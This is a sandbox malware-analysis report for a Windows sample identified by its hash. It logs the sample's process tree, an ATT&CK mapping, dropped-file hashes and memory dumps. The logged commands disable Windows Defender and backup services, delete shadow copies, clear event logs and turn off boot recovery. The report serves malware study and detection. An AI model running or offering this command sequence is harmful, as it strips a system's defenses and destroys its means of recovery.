PID 3672 wrote to memory of 2228	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 2228	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 2924	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 2924	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 2932	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 2932	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
"C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:3208

C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:1176

C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:2936

C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
3⤵
PID:4052

C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:3148

C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:3772

C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:2588

C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:2060

C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1372d" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1372d" /y
3⤵
PID:604

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
PID:1736

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
PID:712

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
PID:1872

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
2⤵
PID:3812

C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
PID:3936

C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
2⤵
PID:2440

C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
PID:2192

C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
PID:2524

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1372d" start= disabled
2⤵
PID:2328

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1996

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:3004

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:2228

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:2924

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:2932

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:60

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
PID:1440

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
PID:1744

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:2396

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
PID:2224

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:3996

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:3124

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:4032

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:1164

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:2088

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:3696

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:620

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:1916

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:3772

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:1480

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:1532

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:2056

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:3296

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:364

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1732

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:3824

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1652

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:820

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1284

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1684

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2164

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:752

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4076

C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:3924

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:320

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:3868

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:1880

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
3⤵
- Deletes Windows Defender Definitions
PID:296

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1896

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:1864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1216

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Disabling Security Tools

T1089

Indicator Removal on Host

T1070

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e35cb1559a441de2aae831255028e647

SHA1
8f3cada79ce58e0f268fe0fffeb09b8cc321a97a

SHA256
2b8f25768e38408b5fed49df9a68b1ffcf3fa0826fdb5510f711e4053ebc45c2

SHA512
2dbc1f3a73b553eea2f08bd518374235971b6b06a87c349d41685d5527a2dfefad87785f452370bcfe3a1e765aa672fd1bb857a4e4d354db098abab7b50eed3a

Download Submit
memory/60-147-0x0000000000000000-mapping.dmp

Download
memory/364-165-0x0000000000000000-mapping.dmp

Download
memory/604-132-0x0000000000000000-mapping.dmp

Download
memory/620-158-0x0000000000000000-mapping.dmp

Download
memory/692-121-0x0000000000000000-mapping.dmp

Download
memory/712-134-0x0000000000000000-mapping.dmp

Download
memory/752-173-0x0000000000000000-mapping.dmp

Download
memory/820-169-0x0000000000000000-mapping.dmp

Download
memory/832-176-0x0000000000000000-mapping.dmp

Download
memory/1164-155-0x0000000000000000-mapping.dmp

Download
memory/1176-118-0x0000000000000000-mapping.dmp

Download
memory/1216-231-0x000002972D733000-0x000002972D735000-memory.dmp

Filesize
8KB

Download
memory/1216-227-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-220-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-258-0x000002972D738000-0x000002972D739000-memory.dmp

Filesize
4KB

Download
memory/1216-235-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-218-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-232-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-219-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-225-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-234-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-222-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-221-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-226-0x0000029713750000-0x0000029713752000-memory.dmp

Filesize
8KB

Download
memory/1216-230-0x000002972D730000-0x000002972D732000-memory.dmp

Filesize
8KB

Download
memory/1216-257-0x000002972D736000-0x000002972D738000-memory.dmp

Filesize
8KB

Download
memory/1284-170-0x0000000000000000-mapping.dmp

Download
memory/1324-117-0x0000000000000000-mapping.dmp

Download
memory/1440-148-0x0000000000000000-mapping.dmp

Download
memory/1480-161-0x0000000000000000-mapping.dmp

Download
memory/1532-162-0x0000000000000000-mapping.dmp

Download
memory/1652-168-0x0000000000000000-mapping.dmp

Download
memory/1684-171-0x0000000000000000-mapping.dmp

Download
memory/1732-166-0x0000000000000000-mapping.dmp

Download
memory/1736-133-0x0000000000000000-mapping.dmp

Download
memory/1744-149-0x0000000000000000-mapping.dmp

Download
memory/1788-119-0x0000000000000000-mapping.dmp

Download
memory/1872-135-0x0000000000000000-mapping.dmp

Download
memory/1896-186-0x00000284EB040000-0x00000284EB041000-memory.dmp

Filesize
4KB

Download
memory/1896-194-0x00000284CF156000-0x00000284CF158000-memory.dmp

Filesize
8KB

Download
memory/1896-187-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-189-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-229-0x00000284CF158000-0x00000284CF159000-memory.dmp

Filesize
4KB

Download
memory/1896-180-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-190-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-191-0x00000284EB1F0000-0x00000284EB1F1000-memory.dmp

Filesize
4KB

Download
memory/1896-185-0x00000284CF153000-0x00000284CF155000-memory.dmp

Filesize
8KB

Download
memory/1896-183-0x00000284CF150000-0x00000284CF152000-memory.dmp

Filesize
8KB

Download
memory/1896-192-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-188-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-184-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-215-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-216-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-179-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-181-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1896-182-0x00000284CF140000-0x00000284CF142000-memory.dmp

Filesize
8KB

Download
memory/1916-159-0x0000000000000000-mapping.dmp

Download
memory/1976-131-0x0000000000000000-mapping.dmp

Download
memory/1996-142-0x0000000000000000-mapping.dmp

Download
memory/2016-129-0x0000000000000000-mapping.dmp

Download
memory/2056-163-0x0000000000000000-mapping.dmp

Download
memory/2060-130-0x0000000000000000-mapping.dmp

Download
memory/2088-156-0x0000000000000000-mapping.dmp

Download
memory/2128-178-0x0000000000000000-mapping.dmp

Download
memory/2164-172-0x0000000000000000-mapping.dmp

Download
memory/2192-139-0x0000000000000000-mapping.dmp

Download
memory/2224-151-0x0000000000000000-mapping.dmp

Download
memory/2228-144-0x0000000000000000-mapping.dmp

Download
memory/2328-141-0x0000000000000000-mapping.dmp

Download
memory/2396-150-0x0000000000000000-mapping.dmp

Download
memory/2440-138-0x0000000000000000-mapping.dmp

Download
memory/2524-140-0x0000000000000000-mapping.dmp

Download
memory/2588-128-0x0000000000000000-mapping.dmp

Download
memory/2924-145-0x0000000000000000-mapping.dmp

Download
memory/2932-146-0x0000000000000000-mapping.dmp

Download
memory/2936-120-0x0000000000000000-mapping.dmp

Download
memory/3004-143-0x0000000000000000-mapping.dmp

Download
memory/3124-153-0x0000000000000000-mapping.dmp

Download
memory/3148-124-0x0000000000000000-mapping.dmp

Download
memory/3208-116-0x0000000000000000-mapping.dmp

Download
memory/3296-164-0x0000000000000000-mapping.dmp

Download
memory/3340-177-0x0000000000000000-mapping.dmp

Download
memory/3496-125-0x0000000000000000-mapping.dmp

Download
memory/3648-123-0x0000000000000000-mapping.dmp

Download
memory/3696-157-0x0000000000000000-mapping.dmp

Download
memory/3764-127-0x0000000000000000-mapping.dmp

Download
memory/3772-160-0x0000000000000000-mapping.dmp

Download
memory/3772-126-0x0000000000000000-mapping.dmp

Download
memory/3812-136-0x0000000000000000-mapping.dmp

Download
memory/3824-167-0x0000000000000000-mapping.dmp

Download
memory/3924-175-0x0000000000000000-mapping.dmp

Download
memory/3936-137-0x0000000000000000-mapping.dmp

Download
memory/3996-152-0x0000000000000000-mapping.dmp

Download
memory/4016-115-0x0000000000000000-mapping.dmp

Download
memory/4032-154-0x0000000000000000-mapping.dmp

Download
memory/4052-122-0x0000000000000000-mapping.dmp

Download
memory/4076-174-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads